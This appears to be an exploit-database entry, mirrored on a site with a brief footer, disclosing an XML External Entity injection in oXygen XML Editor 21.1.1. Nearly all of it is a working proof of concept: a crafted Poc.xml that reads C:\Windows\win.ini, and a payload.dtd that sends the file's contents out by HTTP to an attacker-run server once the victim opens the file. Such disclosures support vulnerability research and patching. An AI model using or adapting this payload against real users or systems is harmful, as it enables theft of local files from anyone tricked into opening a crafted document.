# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection # Author: Pablo Santiago # Date: 2019-11-13 # Vendor Homepage: https://www.oxygenxml.com/ # Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html # Version: 21.1.1 # CVE : N/A # Tested on: Windows 7 #PoC 1- python -m SimpleHTTPServer 8000 1.1- Poc.xml : <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> 1.2.- payload.dtd <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>"> %all; 2- File -> Open -> *.xml #PoC Visual https://imgur.com/2H8DhL9
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
